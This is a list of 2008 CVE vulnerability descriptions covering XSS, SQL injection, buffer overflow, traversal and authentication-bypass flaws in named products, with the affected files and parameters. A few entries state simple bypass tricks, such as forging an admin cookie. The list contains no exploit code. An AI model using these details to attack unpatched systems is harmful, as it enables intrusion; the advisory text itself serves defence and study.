[CVE-2008-3666] Unspecified vulnerability in Sun Solaris 10 and OpenSolaris before snv_96 allows (1) context-dependent attackers to cause a denial of service (panic) via vectors involving creation of a crafted file and use of the sendfilev system call, as demonstrated by a file served by an Apache 2.2.x web server with EnableSendFile configured
[CVE-2008-3664] Multiple cross-site scripting (XSS) vulnerabilities in XRMS allow remote attackers to inject arbitrary web script or HTML via (1) the real name field, related to the user list
[CVE-2008-3656] Algorithmic complexity vulnerability in the WEBrick::HTTPUtils.split_header_value function in WEBrick::HTTP::DefaultFileHandler in WEBrick in Ruby 1.8.5 and earlier, 1.8.6 through 1.8.6-p286, 1.8.7 through 1.8.7-p71, and 1.9 through r18423 allows context-dependent attackers to cause a denial of service (CPU consumption) via a crafted HTTP request that is processed by a backtracking regular expression.
[CVE-2008-3650] Multiple unspecified vulnerabilities in Horde Groupware Webmail before Edition 1.1.1 (final) have unknown impact and attack vectors related to "unescaped output," possibly cross-site scripting (XSS), in the (1) object browser and (2) contact view.
[CVE-2008-3632] Use-after-free vulnerability in WebKit in Apple iPod touch 1.1 through 2.0.2, and iPhone 1.0 through 2.0.2, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a web page with crafted Cascading Style Sheets (CSS) import statements.
[CVE-2008-3622] Cross-site scripting (XSS) vulnerability in Wiki Server in Apple Mac OS X 10.5 through 10.5.4 allows remote attackers to inject arbitrary web script or HTML via an e-mail message that reaches a mailing-list archive, aka "persistent JavaScript injection."
[CVE-2008-3602] admin/wr_admin.php in PHP-Ring Webring System (aka uPHP_ring_website) 0.9.1 allows remote attackers to bypass authentication and gain administrative access by setting the admin cookie to 1.
[CVE-2008-3596] Cross-site scripting (XSS) vulnerability in Harmoni before 1.4.7 allows remote attackers to inject arbitrary web script or HTML via the Username field, which is inserted into logs that could be rendered when viewed by an administrator.
[CVE-2008-3587] Cross-site scripting (XSS) vulnerability in result.php in Chris Bunting Homes 4 Sale allows remote attackers to inject arbitrary web script or HTML via the r parameter.
[CVE-2008-3581] Cross-site scripting (XSS) vulnerability in index.php in Qsoft K-Links allows remote attackers to inject arbitrary web script or HTML via the login_message parameter in a login action.
[CVE-2008-3574] Multiple cross-site scripting (XSS) vulnerabilities in Pluck 4.5.2, when register_globals is enabled, allow remote attackers to inject arbitrary web script or HTML via the (1) lang_footer parameter to (a) data/inc/footer.php
[CVE-2008-3572] Cross-site scripting (XSS) vulnerability in index.php in Pligg 9.9.5 allows remote attackers to inject arbitrary web script or HTML via the category parameter.
[CVE-2008-3569] Multiple cross-site scripting (XSS) vulnerabilities in XAMPP 1.6.7, when register_globals is enabled, allow remote attackers to inject arbitrary web script or HTML via the text parameter to (1) iart.php and (2) ming.php.
[CVE-2008-3566] Cross-site scripting (XSS) vulnerability in ZoneO-soft freeForum 1.7 allows remote attackers to inject arbitrary web script or HTML via the acuparam parameter to (1) the default URI or (2) index.php, or (3) the PATH_INFO to index.php. NOTE: the provenance of this information is unknown
[CVE-2008-3565] Multiple cross-site scripting (XSS) vulnerabilities in Meeting Room Booking System (MRBS) 1.2.6 allow remote attackers to inject arbitrary web script or HTML via the area parameter to (1) day.php, (2) week.php, (3) month.php, (4) search.php, (5) report.php, and (6) help.php. NOTE: the provenance of this information is unknown
[CVE-2008-3560] Cross-site scripting (XSS) vulnerability in kshop_search.php in the Kshop module 2.22 for Xoops allows remote attackers to inject arbitrary web script or HTML via the search parameter.
[CVE-2008-3559] Multiple cross-site scripting (XSS) vulnerabilities in KAPhotoservice allow remote attackers to inject arbitrary web script or HTML via the (1) filename parameter to search.asp and the (2) page parameter to order.asp. NOTE: the provenance of this information is unknown
[CVE-2008-3558] Stack-based buffer overflow in the WebexUCFObject ActiveX control in atucfobj.dll in Cisco WebEx Meeting Manager before 20.2008.2606.4919 allows remote attackers to execute arbitrary code via a long argument to the NewObject method.
[CVE-2008-3550] The CQWeb login page in IBM Rational ClearQuest 7.0.1 allows remote attackers to obtain potentially sensitive information (page source code) via a combination of `<script>` and `</script>` sequences in the id field, possibly related to a cross-site scripting (XSS) vulnerability.
[CVE-2008-3516] Multiple cross-site scripting (XSS) vulnerabilities in files generated by Adobe Presenter 6 and 7 before 7.0.1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors involving (1) viewer.swf and (2) loadflash.js, a different vulnerability than CVE-2008-3515.
[CVE-2008-3515] Multiple cross-site scripting (XSS) vulnerabilities in files generated by Adobe Presenter 6 and 7 before 7.0.1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors involving (1) viewer.swf and (2) loadflash.js, a different vulnerability than CVE-2008-3516.
[CVE-2008-3511] Multiple cross-site scripting (XSS) vulnerabilities in Softbiz Image Gallery (Photo Gallery) allow remote attackers to inject arbitrary web script or HTML via the (1) latest parameter to (a) index.php, (b) images.php, (c) suggest_image.php, and (d) image_desc.php
[CVE-2008-3510] Cross-site scripting (XSS) vulnerability in livehelp_js.php in Crafty Syntax Live Help (CSLH) 2.14.6 allows remote attackers to inject arbitrary web script or HTML via the department parameter.
[CVE-2008-3505] Cross-site scripting (XSS) vulnerability in PolyPager 1.0 rc2 and earlier allows remote attackers to inject arbitrary web script or HTML via the nr parameter to the default URI.
[CVE-2008-3503] RSSFromParent in Plain Black WebGUI before 7.5.13 does not restrict view access to Collaboration System (CS) RSS feeds, which allows remote attackers to obtain sensitive information (CS data).
[CVE-2008-3500] Cross-site scripting (XSS) vulnerability in the Suggested Terms module 5.x before 5.x-1.2 for Drupal allows remote authenticated users to inject arbitrary web script or HTML via crafted Taxonomy terms.
[CVE-2008-3483] Cross-site scripting (XSS) vulnerability in ScrewTurn Wiki 2.0.29 and 2.0.30 allows remote attackers to inject arbitrary web script or HTML via error messages in the "/admin.aspx - System Log" page.
[CVE-2008-3482] Cross-site scripting (XSS) vulnerability in the error page feature in Panasonic Network Camera BL-C111, BL-C131, BB-HCM511, BB-HCM531, BB-HCM580, BB-HCM581, BB-HCM527, and BB-HCM515 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-3480] Stack-based buffer overflow in the Anzio Web Print Object (WePO) ActiveX control 3.2.19 and 3.2.24, as used in Anzio Print Wizard, allows remote attackers to execute arbitrary code via a long mainurl parameter.
[CVE-2008-3474] Microsoft Internet Explorer 6 and 7 does not properly determine the domain or security zone of origin of web script, which allows remote attackers to bypass the intended cross-domain security policy and obtain sensitive information via a crafted HTML document, aka "Cross-Domain Information Disclosure Vulnerability."
[CVE-2008-3473] Microsoft Internet Explorer 6 and 7 does not properly determine the domain or security zone of origin of web script, which allows remote attackers to bypass the intended cross-domain security policy, and execute arbitrary code or obtain sensitive information, via a crafted HTML document, aka "Event Handling Cross-Domain Vulnerability."
[CVE-2008-3472] Microsoft Internet Explorer 6 and 7 does not properly determine the domain or security zone of origin of web script, which allows remote attackers to bypass the intended cross-domain security policy, and execute arbitrary code or obtain sensitive information, via a crafted HTML document, aka "HTML Element Cross-Domain Vulnerability."
[CVE-2008-3458] Vtiger CRM before 5.0.4 stores sensitive information under the web root with insufficient access control, which allows remote attackers to read mail merge templates via a direct request to the wordtemplatedownload directory.
[CVE-2008-3457] Cross-site scripting (XSS) vulnerability in setup.php in phpMyAdmin before 2.11.8 allows user-assisted remote attackers to inject arbitrary web script or HTML via crafted setup arguments. NOTE: this issue can only be exploited in limited scenarios in which the attacker must be able to modify config/config.inc.php.
[CVE-2008-3451] PhpWebGallery 1.7.0 and 1.7.1 allows remote authenticated users with advisor privileges to obtain the real e-mail addresses of other users by editing the user's profile.
[CVE-2008-3448] Cross-site scripting (XSS) vulnerability in index.php in common solutions csphonebook 1.02 allows remote attackers to inject arbitrary web script or HTML via the letter parameter.
[CVE-2008-3444] The content layout component in Mozilla Firefox 3.0 and 3.0.1 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted but well-formed web page that contains "a simple set of legitimate HTML tags."
[CVE-2008-3443] The regular expression engine (regex.c) in Ruby 1.8.5 and earlier, 1.8.6 through 1.8.6-p286, 1.8.7 through 1.8.7-p71, and 1.9 through r18423 allows remote attackers to cause a denial of service (infinite loop and crash) via multiple long requests to a Ruby socket, related to memory allocation failure, and as demonstrated against Webrick.
[CVE-2008-3428] Session fixation vulnerability in phpFreeChat 1.1 allows remote authenticated users to hijack web sessions by setting the session_id parameter to match the victim's nickid parameter.
[CVE-2008-3425] Unspecified vulnerability in the Sun Java System Web Server 7.0 plugin in Sun N1 Service Provisioning System (SPS) 5.2 and 6.0 allows remote authenticated SPS users to gain administrative access to the web server via unknown attack vectors.
[CVE-2008-3423] IBM WebSphere Portal 5.1 through 6.1.0.0 allows remote attackers to bypass authentication and obtain administrative access via unspecified vectors.
[CVE-2008-3422] Multiple cross-site scripting (XSS) vulnerabilities in the ASP.net class libraries in Mono 2.0 and earlier allow remote attackers to inject arbitrary web script or HTML via crafted attributes related to (1) HtmlControl.cs (PreProcessRelativeReference), (2) HtmlForm.cs (RenderAttributes), (3) HtmlInputButton (RenderAttributes), (4) HtmlInputRadioButton (RenderAttributes), and (5) HtmlSelect (RenderChildren).
[CVE-2008-3404] Cross-site scripting (XSS) vulnerability in guestbook.js.php in MJGuest 6.8 GT allows remote attackers to inject arbitrary web script or HTML via the link parameter.
[CVE-2008-3398] Multiple cross-site scripting (XSS) vulnerabilities in XRMS CRM 1.99.2 allow remote attackers to inject arbitrary web script or HTML via the msg parameter to unspecified components, possibly including login.php. NOTE: this may overlap CVE-2008-1129.
[CVE-2008-3397] Cross-site scripting (XSS) vulnerability in Runesoft Cerberus CMS before 3_1.4_0.9 allows remote attackers to inject arbitrary web script or HTML via a cerberus_user cookie.
[CVE-2008-3395] Calacode @Mail 5.41 on Linux uses weak world-readable permissions for (1) webmail/libs/Atmail/Config.php and (2) webmail/webadmin/.htpasswd, which allows local users to obtain sensitive information by reading these files. NOTE: the provenance of this information is unknown
[CVE-2008-3394] Multiple cross-site scripting (XSS) vulnerabilities in search.cfm in BookMine allow remote attackers to inject arbitrary web script or HTML via the (1) gallery and (2) search_string parameters.
[CVE-2008-3392] Cross-site request forgery (CSRF) vulnerability in Web Wiz Forum 9.5 allows remote attackers to log out a user via a link or IMG tag to log_off_user.asp.
[CVE-2008-3391] Multiple cross-site scripting (XSS) vulnerabilities in Web Wiz Forum 9.5 allow remote attackers to inject arbitrary web script or HTML via the mode parameter to (1) admin_group_details.asp and (2) admin_category_details.asp.
[CVE-2008-3381] Multiple cross-site scripting (XSS) vulnerabilities in macro/AdvancedSearch.py in moin (and MoinMoin) 1.6.3 and 1.7.0 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-3380] Cross-site scripting (XSS) vulnerability in ajaxp_backend.php in MyioSoft EasyBookMarker 4.0 trial edition (tr) allows remote attackers to inject arbitrary web script or HTML via the rs parameter.
[CVE-2008-3379] Cross-site scripting (XSS) vulnerability in Snark VisualPic 0.3.1 allows remote attackers to inject arbitrary web script or HTML via the pic parameter to the default URI. NOTE: the provenance of this information is unknown
[CVE-2008-3367] Cross-site scripting (XSS) vulnerability in RTE_popup_link.asp in Web Wiz Rich Text Editor (RTE) 3.x and 4.x before 4.03 allows remote attackers to inject arbitrary web script or HTML via the email parameter.
[CVE-2008-3364] Buffer overflow in the ObjRemoveCtrl Class ActiveX control in OfficeScanRemoveCtrl.dll 7.3.0.1020 in Trend Micro OfficeScan Corp Edition (OSCE) Web-Deployment 7.0, 7.3 build 1343 Patch 4 and other builds, and 8.0
[CVE-2008-3361] Stack-based buffer overflow in IntelliTamper 2.07 allows remote web sites to execute arbitrary code via a long HTTP Server header.
[CVE-2008-3358] Cross-site scripting (XSS) vulnerability in Web Dynpro (WD) in the SAP NetWeaver portal, when Internet Explorer 7.0.5730 is used, allows remote attackers to inject arbitrary web script or HTML via a crafted URI, which causes the XSS payload to be reflected in a text/plain document.
[CVE-2008-3353] Multiple cross-site scripting (XSS) vulnerabilities in Pure Software Lore before 1.7.0 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors related to the (1) article comments feature and the (2) search log feature.
[CVE-2008-3348] Cross-site scripting (XSS) vulnerability in staticpages/easycalendar/index.php in MyioSoft EasyDynamicPages 3.0 trial edition (tr) allows remote attackers to inject arbitrary web script or HTML via the year parameter.
[CVE-2008-3344] Multiple cross-site scripting (XSS) vulnerabilities in staticpages/easyecards/index.php in MyioSoft EasyE-Cards 3.5 trial edition (tr) and 3.10a allow remote attackers to inject arbitrary web script or HTML via the (1) ResultHtml, (2) dir, (3) SenderName, (4) RecipientName, (5) SenderMail, and (6) RecipientMail parameters.
[CVE-2008-3342] Cross-site scripting (XSS) vulnerability in staticpages/easypublish/index.php in MyioSoft EasyPublish 3.0tr allows remote attackers to inject arbitrary web script or HTML via the read parameter in an edp_News action.
[CVE-2008-3340] Cross-site scripting (XSS) vulnerability in search_result.cfm in Jobbex JobSite allows remote attackers to inject arbitrary web script or HTML via the searchFor variable (possibly the opt parameter).
[CVE-2008-3336] Multiple cross-site scripting (XSS) vulnerabilities in PunBB before 1.2.19 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors in (1) include/parser.php and (2) moderate.php.
[CVE-2008-3334] Cross-site scripting (XSS) vulnerability in MyBB 1.2.x before 1.2.14 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, possibly involving search.php.
[CVE-2008-3331] Cross-site scripting (XSS) vulnerability in return_dynamic_filters.php in Mantis before 1.1.2 allows remote attackers to inject arbitrary web script or HTML via the filter_target parameter.
[CVE-2008-3330] Cross-site scripting (XSS) vulnerability in services/obrowser/index.php in Horde 3.2 and Turba 2.2 allows remote attackers to inject arbitrary web script or HTML via the contact name.
[CVE-2008-3328] Cross-site scripting (XSS) vulnerability in the wiki engine in Trac before 0.10.5 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
[CVE-2008-3326] Cross-site scripting (XSS) vulnerability in blog/edit.php in Moodle 1.6.x before 1.6.7 and 1.7.x before 1.7.5 allows remote attackers to inject arbitrary web script or HTML via the etitle parameter (blog entry title).
[CVE-2008-3318] admin/index.php in Maian Weblog 4.0 and earlier allows remote attackers to bypass authentication and gain administrative access by sending an arbitrary weblog_cookie cookie.
[CVE-2008-3316] Cross-site scripting (XSS) vulnerability in the search feature in the Forum plugin before 2.7.1 for Geeklog allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, probably related to (1) public_html/index.php, (2) config.php, and (3) functions.inc.
[CVE-2008-3315] Multiple cross-site scripting (XSS) vulnerabilities in Claroline 1.8.10 allow remote attackers to inject arbitrary web script or HTML via the (1) query string to (a) announcements/messages.php
[CVE-2008-3305] Cross-site scripting (XSS) vulnerability in mensaje.php in C. Desseno YouTube Blog (ytb) 0.1 allows remote attackers to inject arbitrary web script or HTML via the m parameter.
[CVE-2008-3301] Multiple cross-site scripting (XSS) vulnerabilities in BilboBlog 0.2.1 allow remote authenticated administrators to inject arbitrary web script or HTML via the (1) content parameter to admin/update.php, related to conflicting code in widget.php
[CVE-2008-3295] Cross-site scripting (XSS) vulnerability in modules/system/admin.php in XOOPS 2.0.18.1 allows remote attackers to inject arbitrary web script or HTML via the fct parameter. NOTE: the provenance of this information is unknown
[CVE-2008-3293] Directory traversal vulnerability in download.php in EZWebAlbum allows remote attackers to read arbitrary files via the dlfilename parameter.
[CVE-2008-3292] constants.inc in EZWebAlbum 1.0 allows remote attackers to bypass authentication and gain administrator privileges by setting the photoalbumadmin cookie, as demonstrated via addpage.php.
[CVE-2008-3273] JBoss Enterprise Application Platform (aka JBossEAP or EAP) before 4.2.0.CP03, and 4.3.0 before 4.3.0.CP01, allows remote attackers to obtain sensitive information about "deployed web contexts" via a request to the status servlet, as demonstrated by a full=true query string.
[CVE-2008-3261] Open redirect vulnerability in claroline/redirector.php in Claroline before 1.8.10 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the url parameter.
[CVE-2008-3260] Multiple cross-site scripting (XSS) vulnerabilities in Claroline before 1.8.10 allow remote attackers to inject arbitrary web script or HTML via (1) the cwd parameter in a rqMkHtml action to document/rqmkhtml.php, or the query string to (2) announcements/announcements.php, (3) calendar/agenda.php, (4) course/index.php, (5) course_description/index.php, (6) document/document.php, (7) exercise/exercise.php, (8) group/group_space.php, (9) phpbb/newtopic.php, (10) phpbb/reply.php, (11) phpbb/viewtopic.php, (12) wiki/wiki.php, or (13) work/work.php in claroline/.
[CVE-2008-3257] Stack-based buffer overflow in the Apache Connector (mod_wl) in Oracle WebLogic Server (formerly BEA WebLogic Server) 10.3 and earlier allows remote attackers to execute arbitrary code via a long HTTP version string, as demonstrated by a string after "POST /.jsp" in an HTTP request.
[CVE-2008-3255] Cross-site scripting (XSS) vulnerability in LunarNight Laboratory WebProxy 1.7.8 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-3253] Cross-site scripting (XSS) vulnerability in the XenAPI HTTP interfaces in Citrix XenServer Express, Standard, and Enterprise Edition 4.1.0
[CVE-2008-3237] Cross-site scripting (XSS) vulnerability in forward_to_friend.php in ITechBids 7.0 Gold allows remote attackers to inject arbitrary web script or HTML via the productid parameter.
[CVE-2008-3236] Unspecified vulnerability in Wsadmin in the System Management/Repository component in IBM WebSphere Application Server (WAS) 5.1 before 5.1.1.19 allows attackers to obtain sensitive information via vectors related to "previously encrypted properties" that are not encrypted.
[CVE-2008-3235] Unspecified vulnerability in the PropFilePasswordEncoder utility in the Security component in IBM WebSphere Application Server (WAS) 5.1 before 5.1.1.19 has unknown impact and attack vectors.
[CVE-2008-3233] Cross-site scripting (XSS) vulnerability in WordPress before 2.6, SVN development versions only, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-3222] Session fixation vulnerability in Drupal 5.x before 5.9 and 6.x before 6.3, when contributed modules "terminate the current request during a login event," allows remote attackers to hijack web sessions via unknown vectors.
[CVE-2008-3218] Multiple cross-site scripting (XSS) vulnerabilities in Drupal 6.x before 6.3 allow remote attackers to inject arbitrary web script or HTML via vectors related to (1) free tagging taxonomy terms, which are not properly handled on node preview pages, and (2) unspecified OpenID values.
[CVE-2008-3213] SQL injection vulnerability in secciones/tablon/tablon.php in WebCMS Portal Edition allows remote attackers to execute arbitrary SQL commands via the id parameter to portal/index.php in a tablon action. NOTE: some of these details are obtained from third party information.
[CVE-2008-3203] js/pages/pages_data.php in AuraCMS 2.2 through 2.2.2 does not perform authentication, which allows remote attackers to add, edit, and delete web content via a modified id parameter.
[CVE-2008-3202] Cross-site scripting (XSS) vulnerability in index.php in Xomol CMS 1.2 allows remote attackers to inject arbitrary web script or HTML via the current_url parameter in a tellafriend action. NOTE: the provenance of this information is unknown
[CVE-2008-3201] Multiple cross-site scripting (XSS) vulnerabilities in index.php in Pagefusion 1.5 allow remote attackers to inject arbitrary web script or HTML via the (1) acct_fname and (2) acct_lname parameters in an edit action, and the (3) PID, (4) PGID, and (5) rez parameters. NOTE: the provenance of this information is unknown
[CVE-2008-3198] Mozilla Firefox 3.x before 3.0.1 allows remote attackers to inject arbitrary web script into a chrome document via unspecified vectors, as demonstrated by injection into a XUL error page. NOTE: this can be leveraged to execute arbitrary code using CVE-2008-2933.
[CVE-2008-3186] Multiple cross-site scripting (XSS) vulnerabilities in Chipmunk Blog (Blogger) allow remote attackers to inject arbitrary web script or HTML via the membername parameter to (1) members.php, (2) comments.php, (3) photos.php, (4) archive.php, or (5) cat.php. NOTE: the provenance of this information is unknown
[CVE-2008-3184] Multiple cross-site scripting (XSS) vulnerabilities in vBulletin 3.6.10 PL2 and earlier, and 3.7.2 and earlier 3.7.x versions, allow remote attackers to inject arbitrary web script or HTML via (1) the PATH_INFO (PHP_SELF) or (2) the do parameter, as demonstrated by requests to upload/admincp/faq.php. NOTE: this issue can be leveraged to execute arbitrary PHP code.
[CVE-2008-3180] Multiple cross-site scripting (XSS) vulnerabilities in upload/file/language_menu.php in ContentNow CMS 1.4.1 allow remote attackers to inject arbitrary web script or HTML via the (1) pageid parameter or (2) PATH_INFO.
[CVE-2008-3179] Directory traversal vulnerability in website.php in Web 2 Business (W2B) phpDatingClub (aka Dating Club) 3.7 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the page parameter.
[CVE-2008-3178] Unrestricted file upload vulnerability in upload_pictures.php in WebXell Editor 0.1.3 allows remote attackers to execute arbitrary code by uploading a .php file with a jpeg content type, then accessing it via a direct request to the file in upload/.
[CVE-2008-3177] Sophos virus detection engine 2.75 on Linux and Unix, as used in Sophos Email Appliance, Pure Message for Unix, and Sophos Anti-Virus Interface (SAVI), allows remote attackers to cause a denial of service (engine crash) via zero-length MIME attachments.
[CVE-2008-3173] Microsoft Internet Explorer allows web sites to set cookies for domains that have a public suffix with more than one dot character, which could allow remote attackers to perform a session fixation attack and hijack a user's HTTP session, aka "Cross-Site Cooking." NOTE: this issue may exist because of an insufficient fix for CVE-2004-0866.
[CVE-2008-3172] Opera allows web sites to set cookies for country-specific top-level domains that have DNS A records, such as co.tv, which could allow remote attackers to perform a session fixation attack and hijack a user's HTTP session, aka "Cross-Site Cooking."
[CVE-2008-3171] Apple Safari sends Referer headers containing https URLs to different https web sites, which allows remote attackers to obtain potentially sensitive information by reading Referer log data.
[CVE-2008-3170] Apple Safari allows web sites to set cookies for country-specific top-level domains, such as co.uk and com.au, which could allow remote attackers to perform a session fixation attack and hijack a user's HTTP session, aka "Cross-Site Cooking," a related issue to CVE-2004-0746, CVE-2004-0866, and CVE-2004-0867.
[CVE-2008-3161] Multiple cross-site scripting (XSS) vulnerabilities in jsp/common/system/debug.jsp in IBM Maximo 4.1 and 5.2 allow remote attackers to inject arbitrary web script or HTML via the (1) Accept, (2) Accept-Language, (3) UA-CPU, (4) Accept-Encoding, (5) User-Agent, or (6) Cookie HTTP header. NOTE: the provenance of this information is unknown
[CVE-2008-3154] SQL injection vulnerability in index.php in WebBlizzard CMS allows remote attackers to execute arbitrary SQL commands via the page parameter.
[CVE-2008-3130] Multiple cross-site scripting (XSS) vulnerabilities in index.php in OpenCart 0.7.7 allow remote attackers to inject arbitrary web script or HTML via the (1) firstname and (2) search parameters. NOTE: the provenance of this information is unknown
[CVE-2008-3129] Multiple SQL injection vulnerabilities in index.php in Catviz 0.4 beta 1 allow remote attackers to execute arbitrary SQL commands via the (1) foreign_key_value parameter in the news page and (2) webpage parameter in the webpage_multi_edit form.
[CVE-2008-3122] Multiple SQL injection vulnerabilities in Xerox CentreWare Web (CWW) before 4.6.46 allow remote authenticated users to execute arbitrary SQL commands via unspecified vectors.
[CVE-2008-3121] Multiple cross-site scripting (XSS) vulnerabilities in Xerox CentreWare Web (CWW) before 4.6.46 allow remote authenticated users to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-3114] Unspecified vulnerability in Sun Java Web Start in JDK and JRE 6 before Update 7, JDK and JRE 5.0 before Update 16, and SDK and JRE 1.4.x before 1.4.2_18 allows context-dependent attackers to obtain sensitive information (the cache location) via an untrusted application, aka CR 6704074.
[CVE-2008-3113] Unspecified vulnerability in Sun Java Web Start in JDK and JRE 5.0 before Update 16 and SDK and JRE 1.4.x before 1.4.2_18 allows remote attackers to create or delete arbitrary files via an untrusted application, aka CR 6704077.
[CVE-2008-3112] Directory traversal vulnerability in Sun Java Web Start in JDK and JRE 6 before Update 7, JDK and JRE 5.0 before Update 16, and SDK and JRE 1.4.x before 1.4.2_18 allows remote attackers to create arbitrary files via the writeManifest method in the CacheEntry class, aka CR 6703909.
[CVE-2008-3111] Multiple buffer overflows in Sun Java Web Start in JDK and JRE 6 before Update 4, JDK and JRE 5.0 before Update 16, and SDK and JRE 1.4.x before 1.4.2_18 allow context-dependent attackers to gain privileges via an untrusted application, as demonstrated by (a) an application that grants itself privileges to (1) read local files, (2) write to local files, or (3) execute local programs
[CVE-2008-3101] Multiple cross-site scripting (XSS) vulnerabilities in vtiger CRM 5.0.4 allow remote attackers to inject arbitrary web script or HTML via (1) the parenttab parameter in an index action to the Products module, as reachable through index.php
[CVE-2008-3100] Cross-site scripting (XSS) vulnerability in lib/owl.lib.php in Steve Bourgeois and Chris Vincent Owl Intranet Knowledgebase 0.95 and earlier allows remote attackers to inject arbitrary web script or HTML via the username parameter in a getpasswd action to register.php.
[CVE-2008-3098] Cross-site scripting (XSS) vulnerability in admin/usercheck.php in fuzzylime (cms) before 3.03 allows remote attackers to inject arbitrary web script or HTML via the user parameter to the login form.
[CVE-2008-3097] Cross-site scripting (XSS) vulnerability in the Tinytax module (aka Tinytax taxonomy block) 5.x before 5.x-1.10-1 for Drupal allows remote authenticated users to inject arbitrary web script or HTML, probably by creating a crafted taxonomy term.
[CVE-2008-3095] Cross-site scripting (XSS) vulnerability in the Organic Groups (OG) module 5.x before 5.x-7.3 and 6.x before 6.x-1.0-RC1, a module for Drupal, allows remote authenticated users, with group owner permissions, to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-3091] Cross-site scripting (XSS) vulnerability in the Taxonomy Autotagger module 5.x before 5.x-1.8 for Drupal allows remote authenticated users, with create or edit post permissions, to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-3088] Cross-site scripting (XSS) vulnerability in the Files module in Kasseler CMS 1.3.0 and 1.3.1 Lite allows remote attackers to inject arbitrary web script or HTML via the cid parameter in a Category action to index.php.
[CVE-2008-3083] SQL injection vulnerability in Brightcode Weblinks (com_brightweblinks) component for Joomla! allows remote attackers to execute arbitrary SQL commands via the catid parameter.
[CVE-2008-3082] Cross-site scripting (XSS) vulnerability in UPM/English/login/login.asp in Commtouch Enterprise Anti-Spam Gateway 4 and 5 allows remote attackers to inject arbitrary web script or HTML via the PARAMS parameter.
[CVE-2008-3080] Cross-site request forgery (CSRF) vulnerability in admin.php in myWebland myBloggie 2.1.6 allows remote attackers to perform edit actions as administrators. NOTE: this can be leveraged to execute SQL commands by also exploiting CVE-2007-1899.
[CVE-2008-3069] Multiple cross-site scripting (XSS) vulnerabilities in MyBB before 1.2.13 allow remote attackers to inject arbitrary web script or HTML via unspecified parameters to (1) portal.php and (2) inc/functions_post.php.
[CVE-2008-3063] SQL injection vulnerability in login.php in V-webmail 1.5.0 might allow remote attackers to execute arbitrary SQL commands via the username parameter.
[CVE-2008-3061] Open redirect vulnerability in redirect.php in V-webmail 1.5.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the to parameter.
[CVE-2008-3060] V-webmail 1.5.0 allows remote attackers to obtain sensitive information via (1) malformed input in the login page (includes/local.hooks.php) and (2) an invalid session ID, which reveals the installation path in an error message.
[CVE-2008-3037] Cross-site scripting (XSS) vulnerability in the Address Directory (sp_directory) extension 0.2.10 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-3032] Cross-site scripting (XSS) vulnerability in the phpMyAdmin (phpmyadmin) extension 3.0.1 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-3029] Cross-site scripting (XSS) vulnerability in the WEC Discussion Forum (wec_discussion) extension 1.6.2 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-3028] Multiple cross-site scripting (XSS) vulnerabilities in the Send-A-Card (sr_sendcard) extension 2.2.2 and earlier for TYPO3 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-3027] SQL injection vulnerability in get_article.php in VanGogh Web CMS 0.9 allows remote attackers to execute arbitrary SQL commands via the article_ID parameter to index.php.
[CVE-2008-3023] Cross-site scripting (XSS) vulnerability in FreeStyle Wiki 3.6.2 and earlier, and 3.6.3 dev3 and earlier development versions, when Internet Explorer is used, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different issue than CVE-2005-1799.
[CVE-2008-2998] Multiple cross-site scripting (XSS) vulnerabilities in the Aggregation module 5.x before 5.x-4.4 for Drupal allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-2997] Cross-site scripting (XSS) vulnerability in index.php in Gravity Board X (GBX) 2.0 Beta allows remote attackers to inject arbitrary web script or HTML via the subject parameter in a postnewsubmit (aka create new thread) action.
[CVE-2008-2994] Multiple cross-site scripting (XSS) vulnerabilities in PHPEasyData 1.5.4 allow remote attackers to inject arbitrary web script or HTML via the (1) annuaire parameter to (a) last_records.php and (b) annuaire.php and the (2) by and (3) cat_id parameters to annuaire.php.
[CVE-2008-2991] Cross-site scripting (XSS) vulnerability in Adobe RoboHelp Server 6 and 7 allows remote attackers to inject arbitrary web script or HTML via vectors related to the Help Errors log.
[CVE-2008-2987] Multiple cross-site scripting (XSS) vulnerabilities in Benja CMS 0.1 allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to (1) admin_edit_submenu.php, (2) admin_new_submenu.php, and (3) admin_edit_topmenu.php in admin/.
[CVE-2008-2984] Cross-site scripting (XSS) vulnerability in backend/umleitung.php in CMReams CMS 1.3.1.1 Beta 2 allows remote attackers to inject arbitrary web script or HTML via the lang[be_red_text] parameter.
[CVE-2008-2980] Multiple cross-site scripting (XSS) vulnerabilities in HomePH Design 2.10 RC2 allow remote attackers to inject arbitrary web script or HTML via the (1) error_meldung parameter to admin/features/register/register.php, the (2) feature_language[ueberschrift] parameter to admin/features/memberlist/memberlist.php, the (3) language_array[ueberschrift] parameter to admin/features/lostpassword/lostpassword.php, the (4) language_feature[titel] parameter to admin/features/kalender/eingabe.php, and the (5) language_feature[bildmenu] parameter to admin/features/fotogalerie/eingabe.php.
[CVE-2008-2979] Multiple cross-site scripting (XSS) vulnerabilities in phpi/login.php in Ourvideo CMS 9.5 allow remote attackers to inject arbitrary web script or HTML via the (1) top_page and (2) end_page parameters.
